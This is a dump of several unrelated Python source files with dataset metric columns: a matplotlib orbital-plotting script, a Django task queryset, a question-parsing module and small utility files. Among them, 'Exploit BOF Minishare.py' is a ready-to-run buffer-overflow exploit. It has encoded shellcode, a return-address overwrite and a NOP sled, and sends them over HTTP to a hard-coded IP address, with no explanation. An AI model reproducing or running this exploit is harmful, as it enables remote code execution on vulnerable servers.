| 11.833333 | 36 | 0.760563 | 9 | 71 | 6 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183099 | 71 | 5 | 37 | 14.2 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
6bb38fc1b3db701ffa917963d52f59f8c42babe5 | 3,031 | py | Python | 3rd Energy Level/3dPart2.py | aminoj/Interactive-Orbitals-Simulation | 20e405d6a23028049c05f4a0fd73e51857ba9270 | [
"Apache-2.0"
] | null | null | null | 3rd Energy Level/3dPart2.py | aminoj/Interactive-Orbitals-Simulation | 20e405d6a23028049c05f4a0fd73e51857ba9270 | [
"Apache-2.0"
] | null | null | null | 3rd Energy Level/3dPart2.py | aminoj/Interactive-Orbitals-Simulation | 20e405d6a23028049c05f4a0fd73e51857ba9270 | [
"Apache-2.0"
] | 1 | 2020-04-16T08:02:27.000Z | 2020-04-16T08:02:27.000Z | from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
rstride = 15
cstride = 15
MinBound = -5
MaxBound = 5
u = np.linspace(0, 2*np.pi, 100)
v = np.linspace(0, np.pi, 100)
#-------------------------------------------------------------------------------
#Cone
x2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
y2 = 1.5*((1.5*x2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, linewidth=0, color=(0.8,1,0.8))
#-------------------------------------------------------------------------------
#Cone
x2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
y2 = -1.5*((1.5*x2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, color= (0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
x6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
y6 = (abs(((2*x6)**2)+((2*z6)**2)-15)**(0.5))+1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
x6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
y6 = -(abs(((2*x6)**2)+((2*z6)**2)-15)**(0.5))-1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
#--------------------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
#Cone
y2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
x2 = 1.5*((1.5*y2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, linewidth=0, color=(0.8,1,0.8))
#-------------------------------------------------------------------------------
#Cone
y2 = 1.5*np.outer(np.cos(u), np.sin(v))
z2 = 1.5*np.outer(np.sin(u), np.sin(v))
x2 = -1.5*((1.5*y2)**2+(1.5*z2)**2+0.3)**(0.5)
ax.plot_surface(x2, y2, z2, rstride = rstride, cstride = cstride, color= (0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
y6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
x6 = (abs(((2*y6)**2)+((2*z6)**2)-15)**(0.5))+1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
#-------------------------------------------------------------------------------
#Cover
y6 = 1.5*np.outer(np.cos(u), np.sin(v))
z6 = 1.5*np.outer(np.sin(u), np.sin(v))
x6 = -(abs(((2*y6)**2)+((2*z6)**2)-15)**(0.5))-1
ax.plot_surface(x6, y6, z6, rstride = rstride, cstride = cstride, color=(0.8,1,0.8), linewidth=0)
ax.set_xlim3d(MaxBound, MinBound)
ax.set_ylim3d(MaxBound, MinBound)
ax.set_zlim3d(MaxBound, MinBound)
plt.show()
| 34.443182 | 118 | 0.454635 | 501 | 3,031 | 2.724551 | 0.113772 | 0.041026 | 0.046886 | 0.105495 | 0.794139 | 0.794139 | 0.794139 | 0.794139 | 0.794139 | 0.794139 | 0 | 0.091139 | 0.08776 | 3,031 | 87 | 119 | 34.83908 | 0.402532 | 0.220389 | 0 | 0.5 | 0 | 0 | 0.050277 | 0.049425 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6bda1f7325ba63145cc0ca57f0e8fdda66bcc867 | 25 | py | Python | paranuara/companies/serializers/__init__.py | SPLAYER-HD/Paranuara | 5a42f23d761e16e3b486ba04d9185551614f06a5 | [
"MIT"
] | null | null | null | paranuara/companies/serializers/__init__.py | SPLAYER-HD/Paranuara | 5a42f23d761e16e3b486ba04d9185551614f06a5 | [
"MIT"
] | 4 | 2021-06-08T20:53:43.000Z | 2022-03-12T00:13:51.000Z | paranuara/companies/serializers/__init__.py | SPLAYER-HD/RestServiceDjango | 5a42f23d761e16e3b486ba04d9185551614f06a5 | [
"MIT"
] | null | null | null | from .companies import *
| 12.5 | 24 | 0.76 | 3 | 25 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6bdd1aae288e4e03382b31e27b9637b80db7101a | 138 | py | Python | allopy/optimize/regret/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | [
"MIT"
] | 1 | 2021-04-06T04:33:03.000Z | 2021-04-06T04:33:03.000Z | allopy/optimize/regret/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | [
"MIT"
] | null | null | null | allopy/optimize/regret/__init__.py | wangcj05/allopy | 0d97127e5132df1449283198143994b45fb11214 | [
"MIT"
] | null | null | null | from .active import ActivePortfolioRegretOptimizer
from .optimizer import RegretOptimizer
from .portfolio import PortfolioRegretOptimizer
| 34.5 | 50 | 0.891304 | 12 | 138 | 10.25 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 138 | 3 | 51 | 46 | 0.97619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6be6db3f7cba5e349caddb65cd3b434181747349 | 57 | py | Python | operadores basicos/division2.py | gabys12/portafolio-fundamento-de-programacion | c9b47f32e885ed6ae80b14133a609798ea034e19 | [
"CNRI-Python"
] | null | null | null | operadores basicos/division2.py | gabys12/portafolio-fundamento-de-programacion | c9b47f32e885ed6ae80b14133a609798ea034e19 | [
"CNRI-Python"
] | null | null | null | operadores basicos/division2.py | gabys12/portafolio-fundamento-de-programacion | c9b47f32e885ed6ae80b14133a609798ea034e19 | [
"CNRI-Python"
] | null | null | null | a = 57
b = 1.5
c = 60.24
print("a / b / c =",a / b / c)
| 9.5 | 30 | 0.385965 | 15 | 57 | 1.466667 | 0.6 | 0.181818 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0.350877 | 57 | 5 | 31 | 11.4 | 0.378378 | 0 | 0 | 0 | 0 | 0 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
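The `print` in division2.py relies on Python's left-associative chaining of `/`. A minimal sketch confirming how `a / b / c` groups, using the same values as the file:

```python
a, b, c = 57, 1.5, 60.24

# a / b / c is evaluated left to right as (a / b) / c
chained = a / b / c
assert chained == (a / b) / c
assert chained != a / (b / c)  # right-grouping would give a different result
assert a / b == 38.0           # 57 / 1.5 is exact in binary floating point
```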
d4115beafd073ebb473dd7ed0112123910233b80 | 58 | py | Python | yo_indexer/__init__.py | LTibbetts/yo-indexer | 6d77807544cfeb54b24caa804e6b8d0976fcaafa | [
"MIT"
] | 1 | 2021-08-14T11:54:30.000Z | 2021-08-14T11:54:30.000Z | yo_indexer/__init__.py | LTibbetts/yo-indexer | 6d77807544cfeb54b24caa804e6b8d0976fcaafa | [
"MIT"
] | null | null | null | yo_indexer/__init__.py | LTibbetts/yo-indexer | 6d77807544cfeb54b24caa804e6b8d0976fcaafa | [
"MIT"
] | 1 | 2017-11-30T22:35:48.000Z | 2017-11-30T22:35:48.000Z | """init for yo_indexer"""
from yo_indexer import analyzer
| 19.333333 | 31 | 0.775862 | 9 | 58 | 4.777778 | 0.777778 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12069 | 58 | 2 | 32 | 29 | 0.843137 | 0.327586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d41574b679c29eab33c404bb9f923842c709cd37 | 23 | py | Python | __init__.py | Kindos7/feld | 88f92a0583e6f346ad6009e91c14a05d5310fb50 | [
"MIT"
] | null | null | null | __init__.py | Kindos7/feld | 88f92a0583e6f346ad6009e91c14a05d5310fb50 | [
"MIT"
] | null | null | null | __init__.py | Kindos7/feld | 88f92a0583e6f346ad6009e91c14a05d5310fb50 | [
"MIT"
] | null | null | null | from .feld import Feld
| 11.5 | 22 | 0.782609 | 4 | 23 | 4.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d44868a07e0eddb3b4c77d49962d16526eaf3fef | 185 | py | Python | dataset.py | yepedraza/hm-class-nn | 08e9bbd9c2c9ff7faeeb6c317aea16e434d1b233 | [
"MIT"
] | null | null | null | dataset.py | yepedraza/hm-class-nn | 08e9bbd9c2c9ff7faeeb6c317aea16e434d1b233 | [
"MIT"
] | null | null | null | dataset.py | yepedraza/hm-class-nn | 08e9bbd9c2c9ff7faeeb6c317aea16e434d1b233 | [
"MIT"
] | null | null | null | class Dataset:
x_train = []
y_train = []
x_test = []
y_test = []
def __init__(self, x_train, y_train):
self.x_train = x_train
self.y_train = y_train | 20.555556 | 41 | 0.556757 | 27 | 185 | 3.296296 | 0.333333 | 0.269663 | 0.370787 | 0.269663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.324324 | 185 | 9 | 42 | 20.555556 | 0.712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
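The `Dataset` class above declares its lists at class level, which is a common Python pitfall: a class-level mutable default is shared by every instance. A minimal sketch of the difference (class names here are illustrative):

```python
class WithClassList:
    items = []              # one list, shared by all instances

class WithInstanceList:
    def __init__(self):
        self.items = []     # fresh list per instance

a, b = WithClassList(), WithClassList()
a.items.append(1)
assert b.items == [1]       # mutation through `a` leaks into `b`

c, d = WithInstanceList(), WithInstanceList()
c.items.append(1)
assert d.items == []        # each instance keeps its own list
```

Assigning the lists inside `__init__`, as the corrected `Dataset` does, avoids this sharing.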
2e38a55faef529923807a338d221765dc317f09d | 2,038 | py | Python | Exploit BOF Minishare.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-08T23:57:47.000Z | 2022-02-15T09:58:36.000Z | Exploit BOF Minishare.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | null | null | null | Exploit BOF Minishare.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
] | 2 | 2021-09-09T13:42:12.000Z | 2022-02-15T23:39:02.000Z | #!/usr/share/python
import socket
buf = b""
buf += b"\xb8\x1f\xf5\x98\xea\xdb\xd3\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x42\x12\x83\xc2\x04\x03\x5d\xfb\x7a"
buf += b"\x1f\x9d\xeb\xf9\xe0\x5d\xec\x9d\x69\xb8\xdd\x9d\x0e"
buf += b"\xc9\x4e\x2e\x44\x9f\x62\xc5\x08\x0b\xf0\xab\x84\x3c"
buf += b"\xb1\x06\xf3\x73\x42\x3a\xc7\x12\xc0\x41\x14\xf4\xf9"
buf += b"\x89\x69\xf5\x3e\xf7\x80\xa7\x97\x73\x36\x57\x93\xce"
buf += b"\x8b\xdc\xef\xdf\x8b\x01\xa7\xde\xba\x94\xb3\xb8\x1c"
buf += b"\x17\x17\xb1\x14\x0f\x74\xfc\xef\xa4\x4e\x8a\xf1\x6c"
buf += b"\x9f\x73\x5d\x51\x2f\x86\x9f\x96\x88\x79\xea\xee\xea"
buf += b"\x04\xed\x35\x90\xd2\x78\xad\x32\x90\xdb\x09\xc2\x75"
buf += b"\xbd\xda\xc8\x32\xc9\x84\xcc\xc5\x1e\xbf\xe9\x4e\xa1"
buf += b"\x6f\x78\x14\x86\xab\x20\xce\xa7\xea\x8c\xa1\xd8\xec"
buf += b"\x6e\x1d\x7d\x67\x82\x4a\x0c\x2a\xcb\xbf\x3d\xd4\x0b"
buf += b"\xa8\x36\xa7\x39\x77\xed\x2f\x72\xf0\x2b\xa8\x75\x2b"
buf += b"\x8b\x26\x88\xd4\xec\x6f\x4f\x80\xbc\x07\x66\xa9\x56"
buf += b"\xd7\x87\x7c\xf8\x87\x27\x2f\xb9\x77\x88\x9f\x51\x9d"
buf += b"\x07\xff\x42\x9e\xcd\x68\xe8\x65\x86\x56\x45\xbb\xd3"
buf += b"\x3f\x94\x43\xdd\x04\x11\xa5\xb7\x6a\x74\x7e\x20\x12"
buf += b"\xdd\xf4\xd1\xdb\xcb\x71\xd1\x50\xf8\x86\x9c\x90\x75"
buf += b"\x94\x49\x51\xc0\xc6\xdc\x6e\xfe\x6e\x82\xfd\x65\x6e"
buf += b"\xcd\x1d\x32\x39\x9a\xd0\x4b\xaf\x36\x4a\xe2\xcd\xca"
buf += b"\x0a\xcd\x55\x11\xef\xd0\x54\xd4\x4b\xf7\x46\x20\x53"
buf += b"\xb3\x32\xfc\x02\x6d\xec\xba\xfc\xdf\x46\x15\x52\xb6"
buf += b"\x0e\xe0\x98\x09\x48\xed\xf4\xff\xb4\x5c\xa1\xb9\xcb"
buf += b"\x51\x25\x4e\xb4\x8f\xd5\xb1\x6f\x14\xe5\xfb\x2d\x3d"
buf += b"\x6e\xa2\xa4\x7f\xf3\x55\x13\x43\x0a\xd6\x91\x3c\xe9"
buf += b"\xc6\xd0\x39\xb5\x40\x09\x30\xa6\x24\x2d\xe7\xc7\x6c"
# build the request as bytes throughout; mixing str and the bytes shellcode
# in `buf` raises TypeError on Python 3
princi_buffer = b"GET " + b"\x41" * 1787 + b"\xD7\x30\x9D\x7C" + b"\x90" * 20 + buf + b" HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.222.134", 80))
sock.send(princi_buffer)
sock.recv(1024)
sock.close()
| 47.395349 | 95 | 0.665849 | 456 | 2,038 | 2.967105 | 0.489035 | 0.082779 | 0.010347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.241893 | 0.077036 | 2,038 | 42 | 96 | 48.52381 | 0.477406 | 0.008832 | 0 | 0 | 0 | 0.771429 | 0.741266 | 0.710886 | 0.028571 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.028571 | 0 | 0.028571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
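The exploit hard-codes four bytes (`"\xD7\x30\x9D\x7C"`) between the padding and the NOP sled. Assuming, as is typical for a 32-bit stack overflow, that these are a little-endian return address, `struct.pack` makes the encoding explicit instead of hand-reversing the bytes (the address value and `payload` layout below just mirror `princi_buffer`):

```python
import struct

# 0x7C9D30D7 encoded little-endian yields the same four bytes the
# exploit writes by hand
ret_addr = struct.pack("<I", 0x7C9D30D7)
assert ret_addr == b"\xd7\x30\x9d\x7c"

# hypothetical payload layout mirroring princi_buffer (without shellcode)
payload = b"GET " + b"\x41" * 1787 + ret_addr + b"\x90" * 20
assert len(payload) == 4 + 1787 + 4 + 20
```

Keeping the address as an integer makes it obvious what to change when retargeting the overwrite.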
2e6b77ebe0d8a404eeacc575e5cc8639848616d0 | 45 | py | Python | pysedm/script/__init__.py | MickaelRigault/pysedm | 5d34d3a6b48eb3bbb7ba9d89b88b4b5b1ff09624 | [
"Apache-2.0"
] | 5 | 2018-03-16T14:58:09.000Z | 2019-11-25T15:57:14.000Z | pysedm/script/__init__.py | MickaelRigault/pysedm | 5d34d3a6b48eb3bbb7ba9d89b88b4b5b1ff09624 | [
"Apache-2.0"
] | 9 | 2018-02-13T17:02:17.000Z | 2020-09-15T11:43:37.000Z | pysedm/script/__init__.py | MickaelRigault/pysedm | 5d34d3a6b48eb3bbb7ba9d89b88b4b5b1ff09624 | [
"Apache-2.0"
] | 4 | 2018-03-16T14:58:14.000Z | 2022-02-07T20:02:58.000Z | """ Scripts """
from .ccd_to_cube import *
| 9 | 26 | 0.622222 | 6 | 45 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 45 | 4 | 27 | 11.25 | 0.722222 | 0.155556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2e8c139aa592e5bb74d359a36bffe315d1c9fe52 | 1,834 | py | Python | src/task/queries.py | Echeverrias/IE | 24c55f5338d9e9270bbed5af76730bf893891349 | [
"MIT"
] | 2 | 2019-11-28T02:42:25.000Z | 2020-03-05T01:13:40.000Z | src/task/queries.py | Echeverrias/IE | 24c55f5338d9e9270bbed5af76730bf893891349 | [
"MIT"
] | 22 | 2019-12-04T23:41:12.000Z | 2022-03-02T14:58:20.000Z | src/task/queries.py | Echeverrias/IE | 24c55f5338d9e9270bbed5af76730bf893891349 | [
"MIT"
] | 1 | 2020-03-05T01:13:43.000Z | 2020-03-05T01:13:43.000Z | from django.db import models
from django.db.models import Q, F, Count
from datetime import date
TYPE_CRAWLER = 'Crawler'
STATE_FINISHED = 'Terminada'
class TaskQuerySet(models.QuerySet):
def crawler_tasks(self):
return self.filter(type__iexact=TYPE_CRAWLER)
def finished_crawler_tasks(self):
return self.filter(type__iexact=TYPE_CRAWLER).filter(state__iexact=STATE_FINISHED)
def get_latest_crawler_task(self):
try:
return self.crawler_tasks().latest('created_at')
except Exception as e:
return None
def get_latest_crawler_tasks(self):
try:
distinct = self.crawler_tasks().values('name').order_by('name').annotate(name_count=Count('name'))
names = [name.get('name') for name in distinct]
tasks = [self.crawler_tasks().filter(name=name).latest('created_at') for name in names]
pks = [task.pk for task in tasks if task]
qs = self.filter(pk__in=pks).order_by('created_at')
return qs
except Exception as e:
return self.none()
def get_latest_finished_crawler_task(self):
try:
return self.finished_crawler_tasks().latest('created_at')
except Exception as e:
return None
def get_latest_finished_crawler_tasks(self):
try:
distinct = self.crawler_tasks().values('name').order_by('name').annotate(name_count=Count('name'))
names = [name.get('name') for name in distinct]
tasks = [ self.finished_crawler_tasks().filter(name=name).latest('created_at') for name in names]
pks = [task.pk for task in tasks if task]
qs = self.filter(pk__in=pks).order_by('created_at')
return qs
except Exception as e:
return self.none() | 38.208333 | 110 | 0.642312 | 241 | 1,834 | 4.672199 | 0.19917 | 0.106572 | 0.056838 | 0.063943 | 0.804618 | 0.804618 | 0.730018 | 0.730018 | 0.730018 | 0.730018 | 0 | 0 | 0.252454 | 1,834 | 48 | 111 | 38.208333 | 0.821298 | 0 | 0 | 0.55 | 0 | 0 | 0.058856 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.075 | 0.05 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2e8cb0929a4a853a9828c8240b46bd8edb783383 | 6,262 | py | Python | code/parsing/skeleton_parser.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | 1 | 2020-06-20T12:27:11.000Z | 2020-06-20T12:27:11.000Z | code/parsing/skeleton_parser.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | code/parsing/skeleton_parser.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | from common_structs.skeleton import SpanTree
from parsing.models.fine_tuning_based_on_bert_interface import redundancy_span_interface
from parsing.models.fine_tuning_based_on_bert_interface import sequences_classifier_interface
from parsing.models.fine_tuning_based_on_bert_interface import headword_span_interface
from parsing.models.fine_tuning_based_on_bert_interface import simplif_classifier_interface
from parsing import parsing_utils
def span_tree_generation_only_dep(tokens):
span_tree = SpanTree(tokens=tokens)
span_tree.add_span_node(id=0, head_tail_position=[0, len(tokens)], isRoot=True, tokens=tokens)
return span_tree
def span_tree_generation_head(tokens):
    '''
    Generate leaf nodes and non-leaf nodes.
    Each tree node is treated as a list of tokens.
    An edge is treated as a relation between a node and a token
    inside another node.
    '''
epoch = 0
span_tree = SpanTree(tokens=tokens)
root_span_node = span_tree.add_span_node(id=0, head_tail_position=[0, len(tokens)], isRoot=True, tokens=tokens)
while simplif_classifier_interface.process(root_span_node.content) == 1:
epoch = epoch + 1
if epoch > 10:
break
# --------------------------------------
redundancy_span, redundancy_nbest_json = redundancy_span_interface.simple_process(root_span_node.content)
if redundancy_span is None or redundancy_span == 'empty' or redundancy_nbest_json is None or len(root_span_node.tokens) - len(redundancy_span.split(' ')) <= 3:
            # heuristic rule: stop if removal would leave fewer than 4 tokens, or after more than 10 rounds
break
# -----------------head---------------------
headword_index, _ = headword_span_interface.simple_process(question=root_span_node.content, span=redundancy_span)
#update headword index, based on complete sequence
headword_index = parsing_utils.update_headword_index(tokens=root_span_node.tokens, headword_index=headword_index)
# ---------------span position--------------# look for position in utterance
start_index, end_index = parsing_utils.look_for_position(redundancy_span, root_span_node)
if start_index > end_index:
break
sub_tokens = parsing_utils.get_sub_tokens(root_span_node.tokens, start_index=start_index, end_index=end_index)
sub_span_node = span_tree.add_span_node(id=epoch, head_tail_position=[start_index, end_index], tokens=sub_tokens, isRoot=False)
# --------------------------------------
        # Grow the tree structure: decide whether this is a leaf or a non-leaf node.
        # If part of the span node is the root of another node, it is a non-leaf; otherwise it is a leaf.
if not parsing_utils.is_leaf(span_tree=span_tree, span_node=sub_span_node):
            # non-leaf node: equivalent to inserting a node into the tree
parsing_utils.update_span_tree_structure(span_tree=span_tree, sub_span_node=sub_span_node)
# -------------------relation classifier 检测修饰关系-------------------
relation = sequences_classifier_interface.process(line_a=root_span_node.content, line_b=redundancy_span)
# --------------------------------------
# print('###:\t', root_span_node.content)
# print('####:\tspan:', redundancy_span, 'headword_index:', headword_index, 'rel_index:', relation)
span_tree.add_child_rel_with_headword(father_id=root_span_node.id, son_id=sub_span_node.id, headword_position=headword_index, headword_relation=relation)
# --------------------------------------
parsing_utils.update_span_tree_nodes(span_tree=root_span_node, start_index=start_index, end_index=end_index)
# --------------------------------------
return span_tree
def span_tree_generation_joint__(tokens):
    '''
    Generate leaf nodes and non-leaf nodes.
    Each tree node is treated as a list of tokens.
    An edge is treated as a relation between a node and a token
    inside another node.
    '''
from parsing.models.fine_tuning_based_on_bert_interface import joint_three_models_interface
epoch = 0
span_tree = SpanTree(tokens=tokens)
root_span_node = span_tree.add_span_node(id=0, head_tail_position=[0, len(tokens)], isRoot=True, tokens=tokens)
while simplif_classifier_interface.process(root_span_node.content) == 1:
epoch = epoch + 1
if epoch > 10:
break
# --------------------------------------
redundancy_span, headword_index, relation, redundancy_nbest_json = joint_three_models_interface.simple_process(root_span_node.content)
if redundancy_span is None or redundancy_span == 'empty' or redundancy_nbest_json is None or len(root_span_node.tokens)-len(redundancy_span.split(' '))<=3:
            # heuristic rule: stop if removal would leave fewer than 4 tokens, or after more than 10 rounds
break
# -----------------head---------------------
#update headword index, based on complete sequence
headword_index = parsing_utils.update_headword_index(tokens=root_span_node.tokens, headword_index=headword_index)
# ---------------span position--------------
# look for position in utterance
start_index, end_index = parsing_utils.look_for_position(redundancy_span, root_span_node)
if start_index > end_index: break
# --------------------------------------
# reg nodes
sub_tokens = parsing_utils.get_sub_tokens(root_span_node.tokens, start_index=start_index, end_index=end_index)
sub_span_node = span_tree.add_span_node(id=epoch, head_tail_position=[start_index, end_index], tokens=sub_tokens, isRoot=False)
        # Grow the tree structure: decide whether this is a leaf or a non-leaf node.
        # If part of the span node is the root of another node, it is a non-leaf; otherwise it is a leaf.
        if not parsing_utils.is_leaf(span_tree=span_tree, span_node=sub_span_node):  # non-leaf: equivalent to inserting a node
parsing_utils.update_span_tree_structure(span_tree=span_tree, sub_span_node=sub_span_node)
# print('###:\t', root_span_node.content)
# print('####:\tspan:', redundancy_span, 'headword_index:', headword_index, 'rel_index:', relation)
span_tree.add_child_rel_with_headword(father_id=root_span_node.id, son_id=sub_span_node.id,
headword_position=headword_index, headword_relation=relation)
# ---update root span node
parsing_utils.update_span_tree_nodes(span_tree=root_span_node, start_index=start_index, end_index=end_index)
# --------------------------------------
return span_tree
